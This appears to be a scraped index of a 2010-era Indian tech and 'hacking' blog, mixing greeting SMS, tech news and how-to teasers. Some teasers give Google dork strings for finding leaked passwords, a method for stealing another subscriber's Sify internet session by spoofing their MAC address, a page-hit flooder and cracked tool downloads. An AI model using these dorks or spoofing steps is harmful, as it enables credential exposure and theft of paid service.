New Year SMS`s Big and Fresh Collection: Fresh, Funny, Inspirational and Quotes

Happy New Year Message 2011

With all the Rose's Perfume and with all the lights in the world and with all the children's Smiles... I wish that your all dreams come true.Happy New Year 2011!

May the new Year brings new hopes, new promises and new reasons to celebrate your presence in your lives. Have a Joyous New Year!

New Year is a time for celebration of love, of life, of Friendship. It's the time to thank God for wonderful friends, and to bring to their lives as much magic as they bring to ours...So here's celebrating our friendship and praying that its magic continues forever. Happy New Year!

May this year mark the beginning of a year of pleasure and discovery for you.

How to get Mass Twitter followers?

 How to get Mass Twitter followers?

As twitter grows in popularity and stature, it gets to define a number of the rules by which peotple may use the service. Twitter was built in 2006 to answer one simple question, "what are you doing?". Over the last few years it has grown to become an important form of communication between people.


The benefit of being able to influence and communicate to a large audience is well known, and because of that an incentive to grow these audiences will always exist. Unfortunately, some groups will attempt to grow their audiences via any means possible, including means that can be considered unethical, a violation of twitter's terms of service, or in some cases criminal too.
 
But there is a easy way out, where "YOU DONT NEED TO FOLLOW OTHER PEOPLES" but "OTHERS WILL FOLLOW YOU". Sounds nice :P, well it works also. I recently came across to a good website, with a very easy idea of credit system. Means people will follow you for credit(initialy) but thereafter, its your responsibility to keep them engange with YOUR OWN QUALITY CONTENT.
 
This site actualy worked for me, i am not a Superstar, Famous personality, sport person or politician, I am just a simple blogger. I have more than 700+ followers on twitter alone :P its quite huge for me.
 
Check this site now. Click Here  (its not a spam, i too hate spams :P )
 
And yes dont forget to follow me @mr_ankur http://www.twitter.com/mr_ankur
 
Happy Blogging \m/

Top 100 BitTorrent Searches of 2010

Here’s an efficient way to put your finger on the pulse of the movie-watching and software-using public: Check out the top 100 search terms for 2010 on BitTorrent.


thehackersarena.blogspot.com
While there are lots of torrent tracking sites, Kickass Torrents is one of the biggest, and it’s revealed its most popular search terms of the year to file-sharing news site TorrentFreak, giving us a nonscientific glimpse into the data people sought most.

While the year’s not over yet — the movie Tron: Legacy tops this week’s top searches — the big winner for the year (or loser in the eyes of its creators at Warner Bros.) is that mind-bending action flick Inception, which was also 2010’s top user-rated pick on iMDb, followed by Iron Man 2, the term “2010,” and predictably, XXX is in the fourth spot. Looking down the list, the top-searched TV show was Glee, followed by Dexter, True Blood, and House.

Let’s dive into the list itself — take a peek into the zeitgeist of the non-movie-buying public:

Top 10 songs, toys and video games of 2010-Time Magazine

Top 10 Songs, Toys and Video games of 2010-Time Magazine


The Top 10 Movies, Gadgets and iPhone Apps of year 2010

The Top 10 Everything of 2010-Time Magazine

In 50 wide-ranging lists, TIME surveys the highs and lows, the good and the bad, of the past 12 months.

Top 25 Sites We Can't Live Without-Time Magazine

Top 25 Websites We Can`t Live Without-Time Magazine

From Amazon and Google to Craigslist and Wikipedia, here are the sites that we keep bookmarked year after year:

Top 50 passwords you should never use

The attack on Gawker Media site recently once again showed the risk of using weak passwords. Using the same username and password for multiple sites may be convenient, but it can prove costly. An analysis of the passwords stolen in the Gawker incident show that many people are choosing poor passwords, that are easy for online criminals to guess.

Top 10 sms for this Christmas-Fresh List

Top 10 Christmas SMS and greeting messages

More often than not we ‘forward’ the same wishes and greetings that we got from someone else. Who has time to be creative, right? That’s exactly the reason why we bring you ten Christmas wishes to help you express your love to your friends & family this year! It’s a mix of sweet & naughty SMSes, so choose wisely.

Facebook's hottest dating app vs rivals websites: Whats going on..

Race for Hottest Dating Applications
With the rise of the Internet, people began looking for love on websites such as Match.com and EHarmony.com. With the growing popularity of social networks, they're turning to services like AreYouInterested.com.

How to Track Email Messages in Gmail Using EmailOracle

If you are a web worker and have to deal with dozens of emails every single day, tracking an individual email becomes really tiring as well as time consuming. You have clients, partners or employees to whom you send emails and eagerly wait for a response. Some times, the response are sent while some times they aren’t. The problem with non responded emails is that you forget them after a couple of days and suddenly remember that you had sent an email to Mr X a week ago.

Now, you have to search for that specific email within your ever expanding inbox and resend it. It would be better if you can enable a tracking feature for important email messages and know whether the receiver opened and read your email message in the first place. If he sends a reply, it’s all right, but if he doesn’t, you will get a reminder that the recipient has not responded to that specific email since 3 days, for example.


Unfortunately, neither Gmail, Yahoo or Windows live mail has support for tracking emails but a new service named EmailOracle aims to fill the gap using their latest browser extension.


How EmailOracle Works

When you start tracking an email response using Email Oracle, the extension inserts an image with a unique ID at the bottom of the message. If the receiver opens the email message, the unique image loads in his browser. Then, a call is made to the EmailOracle server and the response is flagged as “Read”. The notification is then returned to your inbox as a new message.

If the recipient do not opens the message, the image does not loads and thus, no call is made to the EmailOracle server. You receive a reminder email, as specified in your Email Oracle settings.


How to Start Tracking Emails in Gmail


Here are the step by step instructions:

Facebook: Top Status Trends of year 2010

Facebook: Top Status Trends of year 2010: Complete Collection


Natural disasters and human triumphs made their mark in our 2010 list of top trends in status updates, but more than anything else people wanted to spend time with their friends and family. The fastest growing trend was the use of a new digital shorthand for people to ask their friends to hang out.

Whether looking for something to do or just getting off work, people began to add "HMU" to their status updates when they were ready to meet their friends. Standing for "hit me up," the acronym was barely used last year but grew suddenly and steadily throughout 2010, especially during summer breaks and weekends.

World Moments

Whether it be the tragedy of the Haitian earthquake or the heroic rescue of the Chilean miners ("mineros" in Spanish), global news events captured the world's attention. People shared their collective sadness, concern and hope. Some even let the world know what was happening on the ground in Haiti and Chile.

The world came together for the World Cup, with as many as a half of all status updates referring to the competition at some points during the games.

While HMU made its debut, it wasn't the only digital vernacular to make the list. Talk about "airplanes" surged this year, not because people suddenly discovered travel but because they were citing lyrics from the hugely popular song "Airplanes" by B.o.B. "Barn raising" was the most popular phrase for the Games category as gamers on Facebook asked their friends to help them out on FarmVille.
When the words and phrases facebook analyzed related to each other, we grouped them into categories for the global list that follows. 

How To Publish Blog Posts from Microsoft Word 2010

Every blogger out there looks for easy ways to publish blogs which don’t take up much time; hence the use of many specifically designed blog writing and publishing platforms is commonplace. However, a word processing application such as Microsoft Office 2010 can also be used an effective blog writing app with just a few simple steps.

The advantage of Word is that it can save a lot of time along with giving a lot of features for enhancing the blog post. Here’s how to use Microsoft Word 2010 as an effective blog writing and publishing platform.

How to save your mobile data-Complete Collection of top software

How to save your mobile data

These days, with more powerful devices and increased storage, even a smartphone serves as the primary repository for hundreds of contacts, email addresses, songs, photographs and video. Ever wondered what if you lose your mobile phone or a virus attcak wipes out all data on phone? Other than the phone it also means losing all that data and address book. Imagine, all those documents, digital photographs, videos and songs vanished without a trace.

So to make sure, you don't end up in a similar position, always keep multiple and recent backups of your mobile data. Here are some of the various ways you can back up all your precious data, whether on physical devices, or online, on the 'cloud'.

How to add Favicon or URLicon Icon to your blog or website

How to add a favicon to your blog/website


Most of us don't know what Favicon is, 'Favicon is a small icon(image) displayed at the beginning of the address bar of the browser. It is also called Favourite Icon, Pageicon and URLicon.


The main advantage of creating and using favicon is, it makes it easy to find your blog or site when someone favourited or bookmarked your site/blog among several other sites.

Top Trending topics on Twitter in 2010- Complete Collection

An astounding 25 billion Tweets were sent in 2010. We analyzed all those Tweets to identify the year’s Top 10 Trends, as well as the leading Trends in eight categories: News Events, People, Movies, Television, Technology, World Cup, Sports and Hashtags. Each Trend in the Top 10 list includes multiple related terms, to give the most accurate view of the topics that people cared about most in 2010.

What India searched for in 2010

Like every year, this year too Google Zeitgeist reveals the interests, passions and issues that largely ruled the minds of Netizens in India in 2010. These are the people, topics, issues and more that people in India searched for on Google in 2010.

Like past many years, this year too IRCTC (railway ticket booking) continued to top the charts of the year-on-year fastest rising bracket. However, there are newer entries too like the low-cost smartphone maker Micromax Mobiles and YouTube Videos. Here's over to what India searched for in 2010.

Top 10 Tech Stories Of The Year : The Complete List

Top 10 Tech Stories Of The Year : The Complete List

The cloud, mobile, IBM, Oracle-Sun, SAP, the death of the tactical CIO, HP's CEO shuffle, Apple's rise in the enterprise, and optimized systems were all among 2010's top tech stories. Here's the full list with links to more than 150 analytical and opinionated columns.

Google Chrome OS: Everything you need to know

What is Chrome OS?
Google has made much progress on its Chrome OS effort, but isn’t ready to launch a stable device due to open bugs and unfinished items such as cloud print, support for different webcams and more. So, consumers won’t be able to get a Chrome OS device until they arrive from Acer and Samsung around the middle of 2011. Until then, Google is opening up a consumer pilot program through various channels, the most prominent one being a questionnaire on the Chrome website: if chosen by Google, the company will send you a test netbook for free with the Chrome OS platform.

What guys talk about during an all guys night out

It will be hard to believe but there are some intimate things shared by a couple that guys think it is okay to reveal. Experts say that usually men do not understand proper relationship etiquette and don't think before talking about things you thought were just between the two of you.

Top Internet problems and there solutions


Love surfing the World Wide Web? But often get irritated by the numerous pop-ups, welcome screens and registration requirements that so often appear on websites or videos?

Here are some of the most common Web annoyances and how to get rid of them.

Groupon declines Google’s $6 Billion Offer

Groupon has reportedly rejected Google’s massive $6 billion acquisition offer and intends to stay independent.

The group-buying giant has been the center of the tech world this week after it was reported that Google had offered it $5.3 billion with a $700 million earnout. According to Chicago Breaking Business and Bloomberg, Groupon has decided that it is better off on its own.

Google Search:New features


Google continues to be the world's most-used search engine. So you might think that the search engine giant would roll out new features gently, not wanting to upset its massive user base, right? Not quite.

Google introduces new features of its search engine with little warning and even less explanation of how to use them. The Instant Preview, Wonder Wheel, Timeline, and Date Ranges features are prime examples.

What are they all about? Read on to find out.

New Moblie Browser that Supports Nine Indian Languages

If it has been your dream to browse internet on your mobile phones in your local language, here is a reality. Bitstream Inc, a NASDAQ listed, US based software company, has unveiled BOLT mobile browser with a support for nine Indian languages that include Hindi, Bengali, Punjabi, Telugu, Tamil, Kannada, Gujarati, Malayalam, Oriya. Indeed it has claimed itself to be the first browser in the world to have complete Indic language support.

According to Bitstream, BOLT is available in JavaME (also known as J2ME) and BREW and will offer an uncompromised browsing experience on all types of mobile phones ranging from smartphones to lower-end ones.

Google Chrome 8-Everything you need to know, Download

Google Chrome 8

Google's Chrome browser has got update to version 8. The company has announced Chrome's Stable release, 8.0.552.215.
The new version, in addition to over 800 bug fixes and stability improvements, now contains a built in PDF viewer that is secured in Chrome's sandbox. As always, Chrome 8 also contains latest security fixes.
Chrome 8 also adds built-in support for Chrome Web Store that will allow users to search free or paid Web apps. Similar to Google's Android marketplace and Apple's App Store, Chrome Web Store will also allow Chrome OS users to find, install, and potentially buy Web applications.
"The store's primary purpose is to help Google Chrome users find apps. It'll do this by supporting search, by providing browsable categories of apps, and by displaying lists of various kinds, both curated and auto-generated. User ratings and reviews will be used to rank apps," is how Google describes the Chrome Web Store on its Chrome Web Store developer pages.

According to CNET, Chrome Web Store may launch shortly.
 

How to Use Google voice on your phone using Tpad and Nimbuzz.

How to Use Google voice on your phone using Tpad and Nimbuzz

When you are in wi-fi network your Smartphone work even more smarter and you can google voice service on your phone. Using an International US no along with your local no as a same time is possible with the help of Nimbuzz and Tpad.

We have already given a tutorial on how to create a Google voice account in the countries where Google voice is not allowed and how to get a US based permanent cell no for free but now using the same services we will enable our phone to receive those call or make use of calling using Google voice.

Follow the step by step tutorial on your phone if you have a wi-fi enabled phone :

Amazing trick to create A Google voice account in the countries where Google voice is not allowed

How to create A Google voice account in the countries where Google voice is not allowed

Do you know Google voice? Some of you probably not because it is the service of Google not yet stated in India or say Indian Users Google Voice gives you one number for all your phones, voicemail as easy as email, free US long distance, low rates on international calls so all calls to any US no are free.

But the problem here is many countries outside USA and Canada are not allowed for Google Voice uses yet like India, Brazil etc. But Still you can use the service by using this tutorial and can enjoy free calling to almost any US no from your US bases cell which we have learn in Superb trick to get a US based permanent cell no for you or your company – Free .

You need to follow 6 easy steps as follows:

Superb trick to get a US based permanent cell number-completely FREE

How to get a US based permanent cell no for you or your company – Free

We are going to write this post for many of people who want a US based mobile no Outside USA. This may be used to get calls from your friends in US for free using Google voice or to sign up or use some services which are only available for US based mobile no as +1-XXX-XXX-XXXX. After setting up this you will be able to get a number and virtual mobile on which incoming is free of cost and outgoing for some charges or outgoing free using Google voice.


Using this Online website called Tpad you will be able to get yourself an ip based mobile no which will be fixed something like +1-235-675-3000. Steps need to be followed are:

How to Make Quick Pdf of any website in seconds

How to Make Quick Pdf of any website in seconds 

Over internet we encounter many websites and useful information that we want to store to our computer. Many a times we want to read some content and forward to some of our friends which may or may not have access to the URL like in some offices article related to hacking or internet tutorials are banned. There is a very good solution to this problem that we can convert the Pdf of any sites we need just by putting the URL online no tools or any type of installation required.

Scam: 'See who viewed your Facebook profile'!

Scam: 'See who viewed your Facebook profile'!


Many of us are quite curious to know who viewed our Facebook profile. However, unfortunately scammers too are aware of this, and use the lure of such functionality as a way to trick users.

And, one such scam is again prowling on Facebook having claimed thousands of victims. The rogue application is spreading virally among Facebook users pretending to offer them a way of seeing who has viewed their profile.

According to security firm Sophos, "Messages spreading rapidly across the Facebook social network right now say: OMG OMG OMG... I can't believe this actually works! Now you really can see who viewed your profile!"

Google Earth 6: Everything you need to know

Google Earth 6: Everything you need to know

Google
Google has announced the release of Google Earth 6. The latest version is available for Windows, OS X and Linux. The update that follows Google Earth 5.2 release earlier this year adds three major updates to the virtual geographical tool.

Here's looking into what the latest update includes:

Top 10 things that SHE doesn’t want to hear-must read thing :D

Top 10 things that SHE doesn't want to hear
 
You look a bit fat in that dress
Now which girl would like you telling her that she is looking fat. A statement like this will definitely have you spending the night on the couch.

Your mom looks like she's your younger sister
Yes, girls love their mom, but don't ever do the mistake of comparing them, especially in the looks department. You won't score any brownie points by doing this.

I have the best time with my friends
You may enjoy hanging out with your friends, but that doesn't mean you say that to her on her face. Sometimes it's best to be diplomatic.

I can't go out because I want to watch a match
Unless your girlfriend is a sports buff don't give her this excuse very often.

You remind me of my ex
That's the worst thing you could say to your girlfriend. She will always be left wondering if you got into the relationship only because she is a mirror image of your ex.

My mom is the best cook
Women take great pride in their culinary skills. So don't ever claim that your mom cooks better than any woman in the world. You may just have to put up with burnt food for the rest of the week.

I don't like your friends
Like you love hanging out with your friends, your girlfriend loves her friends. Don't make your dislike for them so obvious. Friends can influence your girl to a great extent, so make sure you are in their good books.

Why do you spend so much on beauty treatments?
Don't question your girlfriend spending long hours in the beauty parlour. If you like to spend time playing football and getting dirty then she'd like to spend her time getting pretty. Accept it!

Wow! That girl is hot
Whether it's Priyanka Chopra or Angelina Jolie or just some random girl on the road, never ogle at a woman openly in front of your girl.

I need some space
If you feel the need for space try and suggest it in a subtle manner. Being far to open about it may leave you with too much space and no gf.

How to hack a web address and redirect to our own web address using notepad

How to hack a web address and redirect to our own web address

A simple text file edit makes sites redirect to another web address. When you type address in address bar in any browser and enter it then it will display another web page, for example:- when you type Google.com you will be redirected to Yahoo.com

Top 15 Hacking softwares-Download with key


Download Top 15 Security Hacking Software



1. Nmap
I think everyone has heard of this one, recently evolved into the 4.x series.
Nmap (”Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of computers and both console and graphical versions are available. Nmap is free and open source.
Can be used by beginners (-sT) or by pros alike (–packet_trace). A very versatile tool, once you fully understand the results.

2. Nessus Remote Security Scanner
Recently went closed source, but is still essentially free. Works with a client-server framework.
Nessus is the world’s most popular vulnera

China directed Google hacking: WikiLeaks

China directed Google hacking: WikiLeaks

The United States believes that Chinese authorities orchestrated a hacking campaign into computers of Google and Western governments, according to leaked documents cited Sunday by The New York Times.

The secret cables obtained by whistleblower site WikiLeaks said that China's Politburo directed the hacking. It cited a cable from the US embassy in Beijing, which mentioned information from "a Chinese contact."

How to Clone Hard Drives

How to Clone Hard Drives

Did know that you could clone your current Hard Drive without having to by extra software? Maybe you didn’t know that all that you needed, was already set up on your current system? Well, it is… and if you follow this tut, you shouldn’t have much of a problem.

Make sure that you have a Master and a Slave setup on your system. The Slave drive, in this case, is where all the data on the Master is going to go to.

How To Hide Your Files In a JPEG-using WinRAR

How To Hide Your Files In a JPEG

Well, did you know you could hide your files in a JPEG file? For this, you will only need to download WinRAR. You just need to have a little knowledge about Command Prompt and have WinRAR installed.

All Google Hacking Keywords-The Complete Collection

Google Hacking Keywords-The Complete Collection

It's not so hard, you just type 1 of these lines into the search bar at www.google.com. Then you'll get several links with secret information about different hompages, for example: admin passwords for ftps, ventrilo servers etc.



"admin account info" filetype:log

!Host=*.* intext:enc_UserPassword=* ext:pcf

Hack Sify Account For Free Internet

How to Hack Sify Account For Free Internet !

Only sify users

U need are a few utilities like angry ip scanner and a Mac Address changer like Gentle Mac Pro. What you got to do fist is scan your ip range and see who all are online then get their mac address. Then use Gentle Mac Pro and change your ip and mac address to some one who is logged on and Bingo you surfing the net for Free. Here are the Link's

How to increase your "Page Hits" using a simple batch file- Best SEO tips

Page hits flooder
Increasing page views of your websites.
This small program can flood ur page hits, but you have to dedicate one browser for it.. like internet explorer

Create Your Own Movies with Xtranormal

Create Your Own Movies with Xtranormal

As always when I watch something clever and creative like that, I found myself wishing for the tools to produce my own little movie (and the hours of necessary free time--but that's another matter).
Text-to-Movie: Click to view larger image.
Turns out the tools are available (and free!) in the form of Xtranormal Text-to-Movie, a simplistic but versatile moviemaking system that runs ent

Sign Into Multiple Google Accounts Simultaneously

Sign Into Multiple Google Accounts Simultaneously

Do you have more than one Google (or Gmail) account? If so, you've undoubtedly encountered the hassle of juggling them in your browser. You have to sign out of one in order to sign into another, and on and on. Major pain.

There were workarounds in the form of the Firefox add-ons, Greasemonkey scripts, and the like, but they were still something of a hassle. (Some people would even open different accounts in different browsers: one in Firefox, another in IE, a third in Chrome, and so on.)

Well, no more--Google's new "multiple sign-in" feature lets you access multiple accounts simultaneously in one browser.

Just sign into your Google Account, access the Account Management page,

Top 25 Worst High-Tech Habits and How to Fix Them

We present to you our 25 worst high-tech habits.



1. Avoiding Security Software

So you thought you could get by without antimalware utilities, just by being mindful of what Web links you click and what e-mail you open. How's that working out for ya? Use something--anything--to protect your PC from the bad guys, who are happy to have you as a target. You can even start with free antivirus software.



2. Failing to Back Up Your Computer

The funny thing about people who admit that they don't back up is that they always preface it by saying, "I know it's bad, but..." Listen: All hard drives crash eventually. All of them. Yours will, too. For help, see our simple guide to getting started with backup.



3. Neglecting Offsite Backup

A thief breaks into your apartment and steals your laptop. No problem: You just backed it up last night. Oh, wait, he stole your backup drive too, because it was sitting right next to the laptop. Store your data in

Top 5 Websites That Used to Rule the Internet

Top 5 Websites That Used to Rule the Internet

The Internet generation is stunningly disloyal. Brands mean very little to us. Our parents might never have bought anything other than a Ford car, or a Westinghouse refrigerator, but we switch online services without a second thought. So join me as I take a look at five Websites that, once upon a time, we simply couldn't live without, but which are either no longer with us, or have perhaps seen better days

1. GeoCities


Once of the original Internet startups created back in 1995, GeoCities offered everybody their very own homepage. Although HTML at the time was pretty easy to master, GeoCities offered tools that made creating pages a matter of a few clicks. And it was all free. Just about anybody could create a Website using GeoCities. Sadly, nearly everybody did. It became clear that graphic design skills are not a dominant characteristic among the American population. Most pages looked like somebody had taken a load of animated GIFs, put a stick of lit dynamite under them, and retired to a safe distance.

GeoCities' gimmick was to build its online community around a geographical location model. Pages of a supposedly financial orientation would end-up under the WallStreet heading, for example, while celebrity gossip would end up in the Hollywood section.

This was a potent concept back in 1999, weak as it might sound today--so much so that GeoCities claimed one third of all Web visitors as the 20th century came to a close. Then again, AOL accounted for even more at the time, so you have to question our priorities back then.

So what happened to GeoCities? Yahoo. Conditions and rules were imposed to tame what was turning into the wild west of the Internet; in the late 90s and early 00s, searching for illegal stuff, such as pirated software or dodgy MP3s, would invariably lead to a GeoCities page. The ease of creating pages had turned into a hindrance. Policing so many pages was a logistical nightmare.

But, most of all, the Internet simply moved on. Fashions changed. Blogs and wikis came along, and it just wasn't cool any longer to have a static home page. Home pages belonged to an era of 14-inch monitors and floppy diskettes.

In 2009, Yahoo! discontinued GeoCities, although--like many of the best things in life--it's available in Japan. Its demise was greeted with dismay.

Several commentators suggested that GeoCities was the first example of how it's impossible for an online service to make money. But we must never forget how important GeoCities was in the evolution of the Internet. It showed people were willing to express themselves online. It proved the Internet was first and foremost a community. And it was the best place to find dodgy MP3s.

 
 
 
2. MySpace
 


Somebody transported in time from 1999 might be forgiven for thinking that MySpace was GeoCities' natural successor. They would have a point. Home pages are replaced with MySpace Profiles, and the whole thing is glued together via a social networking overlay, but there are distinct similarities.

In particular, the same eye-scratching,

"MOBILE NUMBER PORTABILITY"-Everything you need to know

"MOBILE NUMBER PORTABILITY"


Telecom minister Kapil Sibal on Thursday will unveil mobile number portability in Haryana, allowing 18 million cellphone users in the state to retain their number while changing the service provider. Most of the country will have this facility by the New Year, while it will be available throughout the country by March 2011.

Step 1
Send an SMS to 1900 in following format: PORT - eg. PORT 9999999999

Truth Revealed - Making of a Hollywood movie-Shocking pics

How do they do it-Making a Hollywood movie


http://2.bp.blogspot.com/_Fzq94YVbHHM/TG15-p5IdwI/AAAAAAAA3qA/XaxVp0GRVYU/s400/unnatural_nature_01.jpg
http://4.bp.blogspot.com/_Fzq94YVbHHM/TG15-PyMDeI/AAAAAAAA3p4/Pq87qyFv0RQ/s400/unnatural_nature_02.jpg

"Google and Facebook have begun to chip away at its principles"-Tim Berners Lee

"Google and Facebook have begun to chip away at its principles"-Tim Berners Lee

Facebook, LinkedIn and other social networking sites represent "one of several threats" to the future of the world wide web, its founder, Sir Tim Berners-Lee has warned. Some of the web's "most successful inhabitants", such as Facebook and large telecoms companies, have begun to "chip away" at its founding principles, Berners-Lee wrote in a Scientific American journal essay published today. "The web evolved into a powerful, ubiquitous tool because it was built on egalitarian principles," he said. "The web as we know it, however, is being threatened in different ways. Some of its most successful inhabitants have begun to chip away at its principles."

He added: "The more you enter, the more you become locked in. Your social networking site becomes a central platform – a closed silo of content, and one that does not give you full control over your information in it. "The more this kind of architecture gains widespread use, the more the web becomes fragmented, and the less we enjoy a single, universal information space." Berners-Lee also

A new phone from Google could replace credit credits at the register

A new phone from Google could replace credit credits at the register

eric schmidt
Google CEO Eric Schmidt holds up a phone that people will be able to use to pay for purchases




THE GIST                 
  • A new phone from Google will contain a near-field communication chip.
  • The technology will allow a person to tap her phone to a device at the check-out register in order to pay for purchases.
  • Google thinks the phone could replace credit cards.

A new Google mobile phone imbedded with a chip that makes it a virtual wallet so people can "tap and pay" is poised to make its debut, the Internet giant's chief said. The successor to the Internet firm's Nexus One smartphone runs on fresh "Gingerbread" software and is imbedded with a near-field communication chip for financial transactions, according to Google chief executive Eric Schmidt.

"I have here an unannounced product that I carry around with

How to remember TOO Many PASSWORDS

How to remember TOO Many PASSWORDS???

Now a days, most of us have at least 100 IDs and passwords, and is looking for ways to remember or manage them, right? Here is the solution.

Password
Can you keep track of all your passwords? Photograph: Alexander Fediachov/Alamy

I keep an alphabetical list in a little black book, partly because I have more trouble remembering which log-on I used than remembering the password. This is a function of having used four different email addresses over the past 20 years, as well as having different IDs for some different purposes. It's a reasonably safe approach because I don't write down the actual IDs or passwords, just a few letters to remind me which ones I used, and it never leaves my private office.

The first thing to do is to decide which are your really important sites. Examples could include your email and Facebook addresses, Amazon, anything to do with banking, and so on. These five or six sites should have passwords that are unique, hard to guess, and unrelated to one another. One way to remember these passwords is to create a little picture for yourself, based on the site's associations.

You should not re-use the same password even for the less important sites. However, you can devise a personal system that creates hard-to-guess passwords that you know how to reconstruct. One example is to use the initial letters of a line from a popular song. This would give you a string such as MRwtam (Moon River, wider than a mile) which is impervious to a standard "dictionary attack". Into the middle of this

Everything you need to know about USB 3.0

Everything you need to know about USB 3.0

SuperSpeed USB
SuperSpeed USB ... it is coming. Eventually. WIll it be worth the wait?
It looks as though USB 3.0 will not become ubiquitous until Intel adds support to its standard chip sets, and we don't know when that will happen. All we have to go on is a recent item from Taiwan's DigiTimes, which said Intel planned to support USB 3.0 in a forthcoming laptop platform codenamed Chief River, with chips being released to manufacturers around September 2011.

Intel's next laptop platform is codenamed Huron River, and

The infamous website E-petitions shelved

The infamous website E-petitions shelved



Martha Lane Fox
British business entrepreneur Martha Lane Fox Photograph: Teri Pengilley for the Guardian


David Cameron often speaks about openness in government, but a Downing Street innovation to encourage greater public participation has been quietly shelved. Officially, the infamous No 10 e-petitions website, launched by the previous government, is under review.

Technology giant Google to delete Street View data

Technology giant Google to delete Street View data



Google Street View London
Google Street View car in London. Photograph: Harold Cunningham/Getty Images

Google is to delete the sensitive information – including full emails and passwords – it illegally captured from Wi-Fi networks when its Street View cars mapped the UK's towns and cities.


The technology giant has signed a commitment (PDF) to improve its data handling following the

Happy 25th Birthday Microsoft Windows

Happy 25th Birthday Microsoft Windows

It was 25 years ago today that Microsoft released Windows 1.0. The world’s most popular operating system has gone through a number of versions since then, and the next iteration, Windows 8, is expected within 2 years.

Windows 1.0
TheHackingArena.blogspot.com

At the time it launched, Windows() actually wasn’t a full operating system. Rather, it was a graphical user interface (GUI) that ran on top of DOS. Microsoft Chairman Bill Gates said at launch that Windows 1.0, which carried a suggested retail price of $99 in 1985, was “unique software” that would

How To Remove and Add Right-Click Menu Items from Files and Folders

How To Remove and Add Right-Click Menu Items from Files and Folders

Removing Items

A lot of programs you install will add themselves to the right-click menu of your files and/or folders. And most times, you have no choice in the matter and, as a result, your right-click menu can get very long with added items you don't even use. The last person I was helping with this had a right context menu so long that the Rename option was no longer visible!

Fortunately, you can easily remove those unwanted menu items, if you know the registry values to edit. And it's not at all difficult once you know the keys responsible for the additions.

For Files, the secret lies in the "context menu handlers" under the shellex subkey for "All Files" which, in the registry, is nothing but an asterisk - like a dos wildcard, which means

How To Add A Url Address Bar To The Taskbar

How To Add A Url Address Bar To The Taskbar

You can add an Internet URL address bar to your Windows XP taskbar. Doing so will let you type in URLs and launch Web pages without first launching a browser. It will also let you launch some native Windows XP applications in much the same way as you would via the Run menu (so you could type in calc to launch the calculator or mspaint to launch Microsoft Paint. Here's how you add the address bar:

1. Right-click on the taskbar, select Toolbars, and then click Address.

How to delete An "UNDeletable" File

How to Delete An "undeletable" File

  1. Open a Command Prompt window and leave it open.
  2. Close all open programs.
  3. Click Start, Run and enter TASKMGR.EXE
  4. Go to the Processes tab and End Process on Explorer.exe.

How to Make Invisible Password Protected Folder

How to Make Invisible Password Protected Folder

Do you want to password protect your folder? Do you want to make it invisible so that it remains unnoticed by the normal users? Well here is a way to do that. In this post I will show you how to make a password protected folder in Windows without using any additional software. Here is is step by step procedure to create a password protected folder.

How To Hide Partitions Without Using Any Software

How To Hide Partitions Without Using Any Software
Here is a very cool and simple trick to hide any partition of our hard drive on computer. Many times we will think of hiding some confidential data form others.I have shown two easy methods to hide partitions without using any software.
Hide Partitions Using Command Prompt

1. Go to Start–>Run.

Game Boost

GameBoost - program your computer's settings for his best work during the games and surfing the Internet. GameBoost is based on the programs GameGain and Throttle. The utility, which optimizes your computer for maximum performance in online games and internet connection. Made changes to the registry and system files to enhance memory performance, image rendering, animation, speed Internet connections. All changes are made in

Everything you need to know about Facebook's new MESSAGING system


Facebook's much-speculated messaging service is here. CEO Mark Zuckerberg has termed the new system a "convergent" modern messaging system that "handles messages seamlessly across all the ways you want to communicate" in a single inbox.

Though as widely speculated the messaging system is not an email killer, it sure

How to Backup Facebook Data and Download

Now Facebook is supporting a good new feature! You can make backup all of your Facebook Photos, Links, informations, Wall Posts, Messages, Videos etc in a zip file and download it to save your Facebook data on your computer. So if you loose any of your Facebook contents, you can get them from saved backup file. Let's see how to do this job. 


1. Login to your Facebook account.


2. Now at the top right side, go to Account > Account Settings.

Facebook may announce e-mail service on Monday

Social networking site Facebook may announce its e-mail service as early as Monday, if online buzz is to be believed. The announcement of 'Project Titan' could see '@facebook.com' e-mail addresses being unveiled, an overhaul of the site's entire messaging system. No British event is planned, however, so it seems that the so-called "Gmail killer" may have a limited launch, if at all. TechCrunch has reported that the product may be limited at launch, while pointing to the significant potential of a service that integrates e-mail with Facebook's popular places, photos and events applications, reports the Telegraph. Unusually, Facebook has chosen not to use its Palo Alto headquarters for the launch. Instead, the event may be held at Web 2.0 Summit in San Francisco. According to social media news blog Mashable, Facebook's current messaging system is "difficult to manage. Users are unable to send messages outside of Facebook, and the system can't handle simple things like attachments and forwarding". "If Facebook really wants to take on Google, it needs to have a far more robust messaging system, akin to web-based

Real Hide IP 4.0.5.6 Full Version

Download Real Hide IP 4.0.5.6 Full Version (FREE)
Did you know your IP address is exposed every time you visit a website? Your IP address is your online identity and could be used by hackers to break into your computer, steal personal information, or commit other crimes against you. Real Hide IP allows you to surf anonymously, change your IP address, prevent identity theft, and guard against hacker intrusions, all with the click of a button.

Encrypt/Lock Computer Drives Or Pendrive In Windows 7



Encrypt/Lock Computer Drives Or Pendrive In Windows 7



Microsoft Bitlocker drive encryption is used to encrypt/lock any Local drive or removable drives like pendrives.Bitlocker encrypts the drives using 128 bit key.Once the drives are encrypted/locked it can only opened using the password.Microsoft introduced bitlocker encryption in windows vista.The bitlocker feature is currently available in Ultimate and Enterprise editions of windows 7 ,Vista as well as the Windows Server 2008 and Windows Server 2008 R2 .Bitlocker requires that your hard disk should have atleast two NTFS drives :One of the operating system and the other with a minimum size of 100 MB.

Hide Folders in Nokia / Java phones without software

Hide Folders in Nokia / Java phones without software


Have you ever wanted to hide folders in your phone? If yes,there here is very interesting solution for you to hide folders in your phone without the need of any software.This trick can be used for phone from Nokia,Samsung,Motorola,LG or any other company.The only requirement is that your phone should support java which almost all mobile phones support now .
So,If your phone support java then here is the Trick Hide Folders in Nokia / Java phones without software
  1. Create any new folder or you can use any existing folder that is to be hidden.
  2. Rename the folder to any name but with the extension of .jad like if I want to hide my images folder then I will name it as images.jad

14 tips and tricks to buff up your Gmail skills

14 Tips and Tricks to buff up your Gmail skills


8. Back up your filters
Enable the Filter import/export Labs feature and you can back them up (and restore them) from the Filters tab under Settings.

9. Send blocked files
